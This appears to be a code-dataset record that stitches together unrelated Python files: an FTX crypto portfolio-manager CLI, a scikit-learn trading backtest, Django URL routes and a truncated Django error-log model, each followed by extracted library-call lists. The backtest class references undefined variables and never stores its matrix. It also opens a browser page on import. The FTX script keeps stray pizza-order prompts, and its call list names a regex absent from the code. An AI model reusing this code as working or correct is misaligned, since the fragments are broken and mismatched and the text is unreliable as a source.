print('FTX Portfolio Manager')
print('')
def initialise_yaml():
try:
with open(r'configuration_dev.yaml') as file:
dataMap = yaml.safe_load(file)
return dataMap
except Exception as e:
with open(r'configuration.yaml') as file:
dataMap = yaml.safe_load(file)
return dataMap
def get_master_accounts():
config = initialise_yaml()
accounts = config['accounts']
return accounts
def always_show(answers):
return True
def get_master_account_list():
accounts = get_master_accounts()
names = []
for account in accounts:
names.append(account['account_name'])
return sorted(names)
def get_positions_list(answers):
position_list = []
positions = master.list_all_positions()
for position in positions:
position: Position
# position_details = "Market: {} | Side: {} | PnL: {}".format(str(position.market), str(position.side),
# str(position.recent_pnl))
position_details = position.market
position_list.append(position_details)
return position_list
def get_sub_account_list(answers):
accounts = []
accounts.append('All Accounts')
accounts.extend(master.sub_account_names)
return sorted(accounts)
def get_spot_markets(answers):
print(answers)
names = []
markets = master.client.list_spot_markets()
for market in markets:
names.append(market.get('name'))
return names
def parse_close_positions(answers, master_account):
try:
message = ''
# print("get_positions_confirmation_message")
# print(answers)
if answers['positions_operation'] != 'close a position':
if answers['positions_operation'] == 'close all positions':
market = 'all'
market_message = 'All Positions'
elif answers['positions_operation'] == 'close long positions':
market = 'long'
market_message = 'All Long Positions'
elif answers['positions_operation'] == 'close short positions':
market = 'short'
market_message = 'All Short Positions'
else:
market = answers['which_position']
market_message = 'position in ' + answers['which_position']
close_size = int(answers['close_percent'])
if close_size > 0 and close_size < 101:
print("Are you sure you want to close [{}] by [{}%]?".format(market_message, close_size))
return market, close_size
else:
print("Can't close position size by [{}]. Please try again and choose a number between 1 and 100.")
ask_root_question(master_account)
except Exception as e:
print(e)
master_account_question = [{
'type': 'list',
'name': 'account_name',
'message': 'What master account do you want to use?',
'choices': get_master_account_list(),
'filter': lambda val: val.lower(),
'when': always_show
}]
operation_question = [{
'type': 'list',
'name': 'operation',
'message': 'What operation do you want to perform?',
'choices': ['View Balances', 'Track Liquidity', 'View Positions', 'Close Positions', 'Rebalance Portfolio',
'Scaled Order', 'Exit'],
'filter': lambda val: val.lower(),
'when': always_show
}]
scaled_order_questions = [
{
'type': 'list',
'name': 'account_question',
'message': 'Which account do you want to trade from?',
'choices': get_sub_account_list,
'filter': lambda val: val.lower(),
'when': always_show
},
{
'type': 'list',
'name': 'asset_question',
'message': 'Which asset do you want to trade?',
# 'choices': get_account_choices(),
'choices': ["BTC/USD", "ETH/USD", "FTT/USD"],
'filter': lambda val: val.lower(),
'when': always_show
},
{
'type': 'list',
'name': 'buy_or_sell',
'message': 'Buying or selling?',
# 'choices': get_account_choices(),
'choices': ["Buy", "Sell"],
'filter': lambda val: val.lower(),
'when': always_show
},
{
'type': 'input',
'name': 'trade_percentage',
'message': 'What percentage of your available holdings do you want to buy/sell?',
'when': always_show
},
{
'type': 'input',
'name': 'price_high',
'message': 'Enter the highest limit price you want to trade?',
'when': always_show
},
{
'type': 'input',
'name': 'price_low',
'message': 'Enter the lowest limit price you want to trade?',
'when': always_show
},
{
'type': 'input',
'name': 'no_orders',
'message': 'How many trades do you want to spread the total size between?',
'when': always_show
}
]
account_question = [{
'type': 'list',
'name': 'account_question',
'message': 'Which account is the "empty" one that you want to centralise funds in before distributing?',
# 'choices': get_account_choices(),
'choices': ['get choices'],
'filter': lambda val: val.lower()
}]
confirm_question = [
{
'type': 'list',
'name': 'confirm',
'message': 'Are you sure you want to continue?',
'choices': ['No', 'Yes'],
'filter': lambda val: val.lower()
}]
position_questions = [
{
'type': 'list',
'name': 'positions_operation',
'message': 'What do you want to do with your positions?',
'choices': ['Close a Position', 'Close All Positions', 'Close Long Positions', 'Close Short Positions'],
'filter': lambda val: val.lower()
}
,
{
'type': 'list',
'name': 'which_position',
'message': 'Which position do you want to alter?',
'choices': get_positions_list,
'filter': lambda val: val.lower(),
'when': lambda answers: answers['positions_operation'] == 'close a position'
},
{
'type': 'input',
'name': 'close_percent',
'message': 'What percentage of the chosen positions do you want to close? Enter a number between 1 and 100.',
},
]
rebalance_question = [{
'type': 'list',
'name': 'warning_question',
'message': 'This will mean closing any positions you have open in any accounts affected, do you want to continue?',
'choices': ['Yes', 'No'],
'filter': lambda val: val.lower()
}]
questions = [
{
'type': 'list',
'name': 'operation',
'message': 'What operation do you want to perform?',
'choices': ['Close Positions', 'Rebalance Portfolio', 'Small'],
'filter': lambda val: val.lower()
},
{
'type': 'input',
'name': 'quantity',
'message': 'How many do you need?',
'validate': NumberValidator,
'filter': lambda val: int(val)
},
{
'type': 'expand',
'name': 'toppings',
'message': 'What about the toppings?',
'choices': [
{
'key': 'p',
'name': 'Pepperoni and cheese',
'value': 'PepperoniCheese'
},
{
'key': 'a',
'name': 'All dressed',
'value': 'alldressed'
},
{
'key': 'w',
'name': 'Hawaiian',
'value': 'hawaiian'
}
]
},
{
'type': 'rawlist',
'name': 'beverage',
'message': 'You also get a free 2L beverage',
'choices': ['Pepsi', '7up', 'Coke']
},
{
'type': 'input',
'name': 'comments',
'message': 'Any comments on your purchase experience?',
'default': 'Nope, all good!'
},
{
'type': 'list',
'name': 'prize',
'message': 'For leaving a comment, you get a freebie',
'choices': ['cake', 'fries'],
'when': lambda answers: answers['comments'] != 'Nope, all good!'
}
]
# def initialise_account(master_account):
# sub_accounts: list = []
# initialised_master: FTXMasterAccount = None
#
# for key, account in master_account.items():
# if account['master_account']:
# initialised_master = FTXMasterAccount(account['api_key'], account['api_secret'])
# initialised_master.connect()
# client_account = FTXAccount(account['subaccount_name'], account['api_key'], account['api_secret'])
# #client_account.connect()
# sub_accounts.append(client_account)
#
# if initialised_master:
# initialised_master.sub_accounts = sub_accounts
# return initialised_master
#
# return None
def print_account_details(sub_account: FTXMasterAccount):
try:
account_info = sub_account.client.get_account_info()
print("For sub account: [{}]".format(sub_account.name))
total_usd_val = sub_account.total_usd_value
print("Total USD Value of this account: [${}]".format(str(total_usd_val)))
total_btc_col, btc_usd_val = sub_account.total_btc_collateral
total_usd_col, usd_usd_val = sub_account.total_usd_collateral
total_eth_col, eth_usd_val = sub_account.total_eth_collateral
total_ftt_col, ftt_usd_val = sub_account.total_ftt_collateral
btc_percent = str(round(btc_usd_val / total_usd_val * 100, 1)) + "%"
eth_percent = str(round(eth_usd_val / total_usd_val * 100, 1)) + "%"
usd_percent = str(round(usd_usd_val / total_usd_val * 100, 1)) + "%"
ftt_percent = str(round(ftt_usd_val / total_usd_val * 100, 1)) + "%"
table = [["BTC", total_btc_col, btc_usd_val, btc_percent], ["ETH", total_eth_col, eth_usd_val, eth_percent],
["USD", total_usd_col, usd_usd_val, usd_percent], ["FTT", total_ftt_col, ftt_usd_val, ftt_percent],
["Total", 'N/A', total_usd_val, "100%"]]
headers = ["Asset", "# Coins Owned", "USD Value", "% of Capital"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print("")
print("======================================================")
print("======================================================")
print("")
# pie_labels = 'BTC', 'USD', 'ETH', 'FTT'
# pie_data = [btc_usd_val, usd_usd_val, eth_usd_val, ftt_usd_val]
# figureObject, axesObject = plotter.subplots()
# # Draw the pie chart
# axesObject.pie(pie_data,
# labels=pie_labels,
# autopct='%1.1f%%',
# shadow=True,
# startangle=90)
# # Aspect ratio - equal means pie is a circle
# axesObject.axis('equal')
# plotter.show()
except Exception as e:
print(e)
def print_master_account_summary(account: FTXMasterAccount):
print_formatting()
print_title("SUMMARY OF ASSETS")
account_list = 'Main Account, '
for sub in sorted(account.sub_account_names):
account_list = account_list + sub + ', '
account_list = account_list[:-2]
print("Master Account: [{}]".format(account.account_name))
print("Accounts: [{}]".format(account_list))
print(" ")
total_usd_val = round(account.total_usd_value, 2)
total_btc_val = round(account.total_btc_value, 8)
print("Total USD Value of this account: {}".format(format_currency(total_usd_val, 'USD', locale='en_US')))
print("Total BTC Value of this account: {} BTC".format(str(total_btc_val)))
print(" ")
total_btc_col, btc_usd_val = account.total_btc_collateral
total_usd_col, usd_usd_val = account.total_usd_collateral
total_eth_col, eth_usd_val = account.total_eth_collateral
total_ftt_col, ftt_usd_val = account.total_ftt_collateral
btc_percent = str(round(btc_usd_val / total_usd_val * 100, 1)) + "%"
eth_percent = str(round(eth_usd_val / total_usd_val * 100, 1)) + "%"
usd_percent = str(round(usd_usd_val / total_usd_val * 100, 1)) + "%"
ftt_percent = str(round(ftt_usd_val / total_usd_val * 100, 1)) + "%"
table = [["BTC", round(total_btc_col, 8), format_currency(btc_usd_val, 'USD', locale='en_US'), btc_percent],
["ETH", total_eth_col, format_currency(eth_usd_val, 'USD', locale='en_US'), eth_percent],
["USD", round(total_usd_col, 2), format_currency(usd_usd_val, 'USD', locale='en_US'), usd_percent],
["FTT", total_ftt_col, format_currency(ftt_usd_val, 'USD', locale='en_US'), ftt_percent],
["Total", 'N/A', format_currency(total_usd_val, 'USD', locale='en_US'), "100%"]]
headers = ["Asset", "# Coins Owned", "USD Value", "% of Capital"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print_formatting()
print_title("SUMMARY OF STRATEGIES")
print("Accounts: [{}]".format(account_list))
print(" ")
table = []
# Add Main Account first
inner_list = []
inner_list.append("Main Account")
inner_list.append(format_currency(account.by_sub_balances_to_usd(), 'USD', locale='en_US'))
percent_diff = str(round(account.by_sub_balances_to_usd() / total_usd_val * 100, 1)) + "%"
inner_list.append(percent_diff)
table.append(inner_list)
for sub_name, sub_client in account.sub_accounts.items():
inner_list = []
inner_list.append(sub_name)
inner_list.append(format_currency(account.by_sub_balances_to_usd(sub_name), 'USD', locale='en_US'))
percent_diff = str(round(account.by_sub_balances_to_usd(sub_name) / total_usd_val * 100, 1)) + "%"
inner_list.append(percent_diff)
table.append(inner_list)
headers = ["Sub Account", "USD Value", "% of Capital"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print(" ")
print("===========================================================================================================")
print(" ")
def rebalance_operation(master_account: FTXMasterAccount):
""" Take all sub accounts and try to rebalance them evenly.
Start with the accounts with greatest difference and then recursively even them out."""
sub_balances = master_account.get_all_balances()
min = 99999
max = 0
minBalance = None
maxBalance = None
for balance in sub_balances:
if balance.usd_value < min:
min = balance.usd_value
minBalance = balance
elif balance.usd_value > max:
max = balance.usd_value
maxBalance = balance
diff = max - min
def track_liquidity(account: FTXMasterAccount):
""" Print out the current value in USD liquidity for LRAIC tradable assets"""
print_formatting()
print_title("LIQUIDITY TRACKER (1% Away from Asks/Bids)")
assets = []
if account.settings.liquidity_tracker['all']:
# Get list of all markets
markets = account.client.list_markets()
for market in markets:
assets.append(market['name'])
else:
assets = account.settings.liquidity_tracker['markets_list']
table = []
asset_with_liquidty = []
for asset in assets:
# Get orderbook details
book = account.client.get_orderbook(asset, 100)
ask_price = book['asks'][0][0]
bid_price = book['bids'][0][0]
percent_away_from_ask = ask_price * float(1.01)
percent_away_from_bid = bid_price * float(0.99)
ask_liquidity = 0
for ask in book['asks']:
if ask[0] < percent_away_from_ask:
ask_liquidity = ask_liquidity + (ask[0] * ask[1])
else:
break
bid_liquidity = 0
for bid in book['bids']:
if bid[0] > percent_away_from_bid:
bid_liquidity = bid_liquidity + (bid[0] * bid[1])
else:
break
liquidy_dict = {}
liquidy_dict['asset'] = asset
liquidy_dict['ask_liquidity'] = ask_liquidity
liquidy_dict['bid_liquidity'] = bid_liquidity
asset_with_liquidty.append(liquidy_dict)
# Sort the list by liquidity
sorted_liquidity = sorted(asset_with_liquidty, key=lambda x: x['bid_liquidity'], reverse=True)
for asset in sorted_liquidity:
inner_list = []
inner_list.append(asset['asset'])
inner_list.append(format_currency(asset['ask_liquidity'], 'USD', locale='en_US'))
inner_list.append(format_currency(asset['bid_liquidity'], 'USD', locale='en_US'))
table.append(inner_list)
headers = ["Asset", "USD Ask Liquidity", "USD Bid Liquidity"]
print(tabulate(table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print_formatting()
def ask_rebalance_question(master_account):
answers = prompt(rebalance_question, style=custom_style_3)
if answers['rebalance_operation'] == 'yes':
# TODO: Implement
rebalance_operation(master_account)
elif answers['rebalance_operation'] == 'no':
ask_root_question(master_account)
def close_all_positions(master_account: FTXMasterAccount):
for account in master_account.sub_accounts:
pass
# Get positions
# Close positions
def view_positions(master_account):
print_formatting()
print_title("ACCOUNT POSITIONS")
all_positions = master_account.list_all_positions()
table = []
for position in all_positions:
position: Position
inner_list = []
inner_list.append(position.market)
inner_list.append(position.sub_account)
inner_list.append(position.side)
inner_list.append(format(position.open_size, '.8f'))
inner_list.append(format_currency(abs(position.cost), 'USD', locale='en_US'))
inner_list.append(format_currency(position.recent_pnl, 'USD', locale='en_US'))
inner_list.append(format_currency(position.alltime_pnl, 'USD', locale='en_US'))
table.append(inner_list)
sorted_table = sorted(table, key=lambda x: x[5], reverse=True)
headers = ["Market", "Sub Account", "Side", "Size", "Cost", "Current PnL", "All Time PnL"]
print(tabulate(sorted_table, headers=headers, tablefmt='psql', floatfmt='.8f'))
print_formatting()
def close_positions(master_account: FTXMasterAccount, market: str, close_percent: int):
""" Close 1 or many positions by X% """
try:
master_account.close_positions(market, close_percent=close_percent)
print("Success!")
except Exception as e:
print("Uhoh, Exception!: {}".format(e))
print("Recommended you check your FTX accounts/positions manually!")
def ask_position_questions(master_account: FTXMasterAccount):
position_answers = prompt(position_questions, style=custom_style_3)
market, close_percent = parse_close_positions(position_answers, master_account)
confirm_answer = prompt(confirm_question, style=custom_style_3)
if confirm_answer['confirm'] == 'yes':
close_positions(master_account, market, close_percent)
else:
print("Cancelled Operation.")
def ask_order_questions(master_account: FTXMasterAccount):
scaled_order_answers = prompt(scaled_order_questions, style=custom_style_2)
print(scaled_order_answers)
account = scaled_order_answers['account_question']
market = str(scaled_order_answers['asset_question']).capitalize()
side = scaled_order_answers['buy_or_sell']
trade_percentage = scaled_order_answers['trade_percentage']
high = scaled_order_answers['price_high']
low = scaled_order_answers['price_low']
no_orders = scaled_order_answers['no_orders']
print(scaled_order_answers)
if account == 'all accounts':
master_account.scaled_order_all(market=market, side=side, high=high, low=low, percent_size=trade_percentage,
no_orders=no_orders)
else:
master_account.by_sub_scaled_order(account, market=market, side=side, high=high, low=low,
percent_size=trade_percentage, no_orders=no_orders)
def ask_root_question(master_account):
operation_answers = prompt(operation_question, style=custom_style_3)
# print(str(operation_answers))
if operation_answers['operation'] == 'close positions':
ask_position_questions(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'view balances':
print_master_account_summary(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'view positions':
view_positions(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'rebalance portfolio':
# TODO: Implement
pass
elif operation_answers['operation'] == 'track liquidity':
track_liquidity(master_account)
ask_root_question(master_account)
elif operation_answers['operation'] == 'scaled order':
ask_order_questions(master_account)
ask_root_question(master_account)
else:
exit()
def get_account_choices():
settings = initialise_yaml()
master_account = settings['accounts']
return ["CAT", "HAT"]
def print_balances(master_account):
# for sub_account in master_account.sub_accounts:
# sub_account: FTXAccount
# print_account_details(sub_account)
print_master_account_summary(master_account)
def main():
try:
config = initialise_yaml()
accounts = config['accounts']
settings = config['settings']
settings = objdict(settings)
master_account = None
if len(accounts) > 1:
try:
account_answers = prompt(master_account_question, style=custom_style_3)
for account in accounts:
if account['account_name'].lower() == account_answers['account_name']:
master_account = account
except:
master_account = accounts[0]
master_account = objdict(master_account)
print("Defaulting to account: [{}]".format(master_account.account_name))
elif len(accounts) == 1:
master_account = accounts[0]
else:
master_account = None
print("No master accounts detected. Is your configuration.yaml set up correctly?")
if master_account is not None:
master_account = objdict(master_account)
anti_algo_subaccount_name = master_account.anti_algo_subaccount_name
subaccount_names = master_account.subaccount_names
# Initialise accounts
master_account: FTXMasterAccount = FTXMasterAccount(master_account['api_key'], master_account['api_secret'],
master_account.account_name, settings)
if subaccount_names is not None:
master_account.sub_account_names.extend(subaccount_names)
master_account.anti_algo_subaccount_name = anti_algo_subaccount_name
master_account.initialise()
global master
master = master_account
try:
ask_root_question(master_account)
except Exception as e:
print(e)
#rebalance_operation(master_account)
balances = master_account.get_all_balances()
# Assume we are in debug mode rather than running from windows CMD
# Run feature being tested
# master_account.by_sub_get_size_free_collateral('ADAM LRAIC ADA', 50)
# master_account.scaled_order_all('BTC/USD', 'buy', 4500, 3000, 50, no_orders=2)
# master_account.by_sub_usd_flat('ADAM LRAIC ADA')
# master_account.by_sub_scaled_order('adam lraic bch', market='BTC/USD', side='buy', high=4500, low=3050,
# percent_size=100, no_orders=20)
# master_account.all_usd_flat()
# master_account.scaled_order_all(market='BTC/USD', side='buy', high=4500, low=3050,
# percent_size=100, no_orders=20)
# master_account.by_sub_scaled_order('ADAM LRAIC ADA', market='BTC/USD', side='buy', high=4500, low=3050,
# percent_size=100, no_orders=20)
except Exception as e:
print(e)
if __name__ == "__main__":
main()
|
[
"babel.numbers.format_currency",
"ftx.ftx_operations.FTXMasterAccount",
"tabulate.tabulate",
"yaml.safe_load",
"regex.match",
"PyInquirer.prompt"
] |
[((1506, 1660), 'regex.match', 'regex.match', (['"""^([01]{1})?[-.\\\\s]?\\\\(?(\\\\d{3})\\\\)?[-.\\\\s]?(\\\\d{3})[-.\\\\s]?(\\\\d{4})\\\\s?((?:#|ext\\\\.?\\\\s?|x\\\\.?\\\\s?){1}(?:\\\\d+)?)?$"""', 'document.text'], {}), "(\n '^([01]{1})?[-.\\\\s]?\\\\(?(\\\\d{3})\\\\)?[-.\\\\s]?(\\\\d{3})[-.\\\\s]?(\\\\d{4})\\\\s?((?:#|ext\\\\.?\\\\s?|x\\\\.?\\\\s?){1}(?:\\\\d+)?)?$'\n , document.text)\n", (1517, 1660), False, 'import regex\n'), ((19590, 19638), 'PyInquirer.prompt', 'prompt', (['rebalance_question'], {'style': 'custom_style_3'}), '(rebalance_question, style=custom_style_3)\n', (19596, 19638), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((21518, 21566), 'PyInquirer.prompt', 'prompt', (['position_questions'], {'style': 'custom_style_3'}), '(position_questions, style=custom_style_3)\n', (21524, 21566), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((21672, 21718), 'PyInquirer.prompt', 'prompt', (['confirm_question'], {'style': 'custom_style_3'}), '(confirm_question, style=custom_style_3)\n', (21678, 21718), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((21961, 22013), 'PyInquirer.prompt', 'prompt', (['scaled_order_questions'], {'style': 'custom_style_2'}), '(scaled_order_questions, style=custom_style_2)\n', (21967, 22013), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((22936, 22984), 'PyInquirer.prompt', 'prompt', (['operation_question'], {'style': 'custom_style_3'}), '(operation_question, style=custom_style_3)\n', (22942, 22984), False, 'from PyInquirer import style_from_dict, Token, prompt\n'), ((15528, 15593), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (15536, 15593), False, 'from tabulate import tabulate\n'), ((16562, 16627), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (16570, 16627), False, 'from tabulate import tabulate\n'), ((19440, 19505), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (19448, 19505), False, 'from tabulate import tabulate\n'), ((20937, 21009), 'tabulate.tabulate', 'tabulate', (['sorted_table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(sorted_table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (20945, 21009), False, 'from tabulate import tabulate\n'), ((2852, 2872), 'yaml.safe_load', 'yaml.safe_load', (['file'], {}), '(file)\n', (2866, 2872), False, 'import yaml\n'), ((12823, 12888), 'tabulate.tabulate', 'tabulate', (['table'], {'headers': 'headers', 'tablefmt': '"""psql"""', 'floatfmt': '""".8f"""'}), "(table, headers=headers, tablefmt='psql', floatfmt='.8f')\n", (12831, 12888), False, 'from tabulate import tabulate\n'), ((14228, 14281), 'babel.numbers.format_currency', 'format_currency', (['total_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(total_usd_val, 'USD', locale='en_US')\n", (14243, 14281), False, 'from babel.numbers import format_currency\n'), ((14968, 15019), 'babel.numbers.format_currency', 'format_currency', (['btc_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(btc_usd_val, 'USD', locale='en_US')\n", (14983, 15019), False, 'from babel.numbers import format_currency\n'), ((15071, 15122), 'babel.numbers.format_currency', 'format_currency', (['eth_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(eth_usd_val, 'USD', locale='en_US')\n", (15086, 15122), False, 'from babel.numbers import format_currency\n'), ((15184, 15235), 'babel.numbers.format_currency', 'format_currency', (['usd_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(usd_usd_val, 'USD', locale='en_US')\n", (15199, 15235), False, 'from babel.numbers import format_currency\n'), ((15287, 15338), 'babel.numbers.format_currency', 'format_currency', (['ftt_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(ftt_usd_val, 'USD', locale='en_US')\n", (15302, 15338), False, 'from babel.numbers import format_currency\n'), ((15384, 15437), 'babel.numbers.format_currency', 'format_currency', (['total_usd_val', '"""USD"""'], {'locale': '"""en_US"""'}), "(total_usd_val, 'USD', locale='en_US')\n", (15399, 15437), False, 'from babel.numbers import format_currency\n'), ((19176, 19238), 'babel.numbers.format_currency', 'format_currency', (["asset['ask_liquidity']", '"""USD"""'], {'locale': '"""en_US"""'}), "(asset['ask_liquidity'], 'USD', locale='en_US')\n", (19191, 19238), False, 'from babel.numbers import format_currency\n'), ((19266, 19328), 'babel.numbers.format_currency', 'format_currency', (["asset['bid_liquidity']", '"""USD"""'], {'locale': '"""en_US"""'}), "(asset['bid_liquidity'], 'USD', locale='en_US')\n", (19281, 19328), False, 'from babel.numbers import format_currency\n'), ((20581, 20640), 'babel.numbers.format_currency', 'format_currency', (['position.recent_pnl', '"""USD"""'], {'locale': '"""en_US"""'}), "(position.recent_pnl, 'USD', locale='en_US')\n", (20596, 20640), False, 'from babel.numbers import format_currency\n'), ((20668, 20728), 'babel.numbers.format_currency', 'format_currency', (['position.alltime_pnl', '"""USD"""'], {'locale': '"""en_US"""'}), "(position.alltime_pnl, 'USD', locale='en_US')\n", (20683, 20728), False, 'from babel.numbers import format_currency\n'), ((25501, 25617), 'ftx.ftx_operations.FTXMasterAccount', 'FTXMasterAccount', (["master_account['api_key']", "master_account['api_secret']", 'master_account.account_name', 'settings'], {}), "(master_account['api_key'], master_account['api_secret'],\n master_account.account_name, settings)\n", (25517, 25617), False, 'from ftx.ftx_operations import FTXMasterAccount, Position, Order\n'), ((2999, 3019), 'yaml.safe_load', 'yaml.safe_load', (['file'], {}), '(file)\n', (3013, 3019), False, 'import yaml\n'), ((24519, 24572), 'PyInquirer.prompt', 'prompt', (['master_account_question'], {'style': 'custom_style_3'}), '(master_account_question, style=custom_style_3)\n', (24525, 24572), False, 'from PyInquirer import style_from_dict, Token, prompt\n')]
|
import webbrowser
import numpy as np
import pandas as pd
from pandas_datareader import data as web
from sklearn import linear_model
webbrowser.open("https://github.com/philliphsu/BottomSheetPickers")
class ScikitBacktest(object):
def __init__(self, sys):
self.data = d
self.matrix = m
self.lags = 5
self.symbol = sys
self.get_data()
self.lm = linear_model.LogisticRegression(C=1e3)
def get_data(self):
d = web.DataReader(self.sys, data_source='yahoo')['Adj Close']
d = pd.DataFrame(d)
d.columns = [self.symbol]
d['returns'] = np.log(d / d.shift())
def select_data(self, start, end):
d = self.data[(self.data.index >= start) & (self.data.index <= end)].copy()
return d
def get_matrix(self, start, end):
d = self.select_data(start, end)
m = np.zeros((self.lags + 1, len(d) - self.lags))
for i in range(self.lags + 1):
if i == self.lags:
m[i] = d[i:]
else:
m[i] = d[i:i - self.lags]
def fit_model(self, start, end):
self.get_matrix(start, end)
self.lm.fit(self.matrix[:self.lags], np.sign(self.matrix[self.lags]))
def predict_moves(self, start, end):
self.get_matrix(start, end)
pred = self.lm.predict(self.matrix[:self.lags])
return pred
def run_strategy(self, start_tr, end_tr, start_te, end_te, lags):
self.lags = lags
self.fit_model(start_tr, end_tr)
pred = self.predict_moves(start_te, end_te)
d = self.select_data(start_te, end_te)
d['pred'] = 0.0
d['pred'].ix[self.lags:] = pred
d['strategy'] = d.pred * d.returns
title = '%s to %s for %d lags' % (start_te, end_te, self.lags)
d[['returns', 'strategy']].ix[self.lags:].cumsum().apply(np.exp).plot(title=title)
|
[
"pandas.DataFrame",
"webbrowser.open",
"pandas_datareader.data.DataReader",
"sklearn.linear_model.LogisticRegression",
"numpy.sign"
] |
[((134, 201), 'webbrowser.open', 'webbrowser.open', (['"""https://github.com/philliphsu/BottomSheetPickers"""'], {}), "('https://github.com/philliphsu/BottomSheetPickers')\n", (149, 201), False, 'import webbrowser\n'), ((399, 440), 'sklearn.linear_model.LogisticRegression', 'linear_model.LogisticRegression', ([], {'C': '(1000.0)'}), '(C=1000.0)\n', (430, 440), False, 'from sklearn import linear_model\n'), ((546, 561), 'pandas.DataFrame', 'pd.DataFrame', (['d'], {}), '(d)\n', (558, 561), True, 'import pandas as pd\n'), ((475, 520), 'pandas_datareader.data.DataReader', 'web.DataReader', (['self.sys'], {'data_source': '"""yahoo"""'}), "(self.sys, data_source='yahoo')\n", (489, 520), True, 'from pandas_datareader import data as web\n'), ((1198, 1229), 'numpy.sign', 'np.sign', (['self.matrix[self.lags]'], {}), '(self.matrix[self.lags])\n', (1205, 1229), True, 'import numpy as np\n')]
|
from django.conf.urls import url
from . import views
urlpatterns=[
url('^$',views.landing,name = 'landingUrl'),
url(r'^profile/create',views.create_profile,name = 'create_profileUrl'),
url(r'^post/create',views.post,name = 'postUrl'),
url(r'^business/create',views.business,name = 'businessUrl'),
url(r'^business/view',views.view_business,name = 'viewBusinessUrl'),
url(r'^move/out',views.move_out,name = 'move_outUrl'),
url(r'^moving/out/(\d+)',views.moving,name = 'movingUrl'),
]
|
[
"django.conf.urls.url"
] |
[((72, 115), 'django.conf.urls.url', 'url', (['"""^$"""', 'views.landing'], {'name': '"""landingUrl"""'}), "('^$', views.landing, name='landingUrl')\n", (75, 115), False, 'from django.conf.urls import url\n'), ((121, 191), 'django.conf.urls.url', 'url', (['"""^profile/create"""', 'views.create_profile'], {'name': '"""create_profileUrl"""'}), "('^profile/create', views.create_profile, name='create_profileUrl')\n", (124, 191), False, 'from django.conf.urls import url\n'), ((198, 245), 'django.conf.urls.url', 'url', (['"""^post/create"""', 'views.post'], {'name': '"""postUrl"""'}), "('^post/create', views.post, name='postUrl')\n", (201, 245), False, 'from django.conf.urls import url\n'), ((252, 311), 'django.conf.urls.url', 'url', (['"""^business/create"""', 'views.business'], {'name': '"""businessUrl"""'}), "('^business/create', views.business, name='businessUrl')\n", (255, 311), False, 'from django.conf.urls import url\n'), ((318, 384), 'django.conf.urls.url', 'url', (['"""^business/view"""', 'views.view_business'], {'name': '"""viewBusinessUrl"""'}), "('^business/view', views.view_business, name='viewBusinessUrl')\n", (321, 384), False, 'from django.conf.urls import url\n'), ((391, 443), 'django.conf.urls.url', 'url', (['"""^move/out"""', 'views.move_out'], {'name': '"""move_outUrl"""'}), "('^move/out', views.move_out, name='move_outUrl')\n", (394, 443), False, 'from django.conf.urls import url\n'), ((450, 507), 'django.conf.urls.url', 'url', (['"""^moving/out/(\\\\d+)"""', 'views.moving'], {'name': '"""movingUrl"""'}), "('^moving/out/(\\\\d+)', views.moving, name='movingUrl')\n", (453, 507), False, 'from django.conf.urls import url\n')]
|
from django.db import models
from django.core.validators import MinValueValidator
from django.contrib.auth import get_user_model
User = get_user_model()
class ErrorLogModelManager(models.Manager):
search_fields = ('level', 'description', 'source')
ordering_fields = ('level', '-level', 'events', '-events')
def filter_logs(self, query_params=None):
queryset = ErrorLog.objects.filter(archived=False)
if query_params is not None:
env = query_params.get('env', None)
ordering = query_params.get('ordering', None)
search_field = query_params.get('field', None)
search = query_params.get('search', None)
if env is not None:
queryset = queryset.filter(env__iexact=env)
if ordering is not None and ordering in self.ordering_fields:
queryset = queryset.order_by(ordering)
if search_field is not None and search_field in self.search_fields and search is not None:
field_query = {f'{search_field}__icontains': search}
queryset = queryset.filter(**field_query)
return queryset
class ErrorLog(models.Model):
LOG_LEVELS = (
('CRITICAL', 'CRITICAL'),
('DEBUG', 'DEBUG'),
('ERROR', 'ERROR'),
('WARNING', 'WARNING'),
('INFO', 'INFO'),
)
LOG_ENVIRONMENTS = (
('PRODUCTION', 'PRODUCTION'),
('HOMOLOGATION', 'HOMOLOGATION'),
('DEV', 'DEV'),
)
user = models.ForeignKey(
User, on_delete=models.CASCADE, related_name='logs')
description = models.CharField('Descriรงรฃo', max_length=256)
source = models.GenericIPAddressField('Origem')
details = models.TextField('Detalhes')
events = models.PositiveIntegerField(
'Eventos', default=1, validators=[MinValueValidator(1)])
date = models.DateTimeField('Data')
level = models.CharField('Level', max_length=16, choices=LOG_LEVELS)
env = models.CharField('Ambiene', max_length=16, choices=LOG_ENVIRONMENTS)
archived = models.BooleanField('Arquivado', default=False)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
objects = ErrorLogModelManager()
class Meta:
verbose_name = 'Error Log'
ordering = ['-created_at']
@property
def owner(self):
return self.user
def archive(self):
self.archived = True
self.save()
def __str__(self):
return self.description
|
[
"django.db.models.TextField",
"django.db.models.ForeignKey",
"django.db.models.CharField",
"django.core.validators.MinValueValidator",
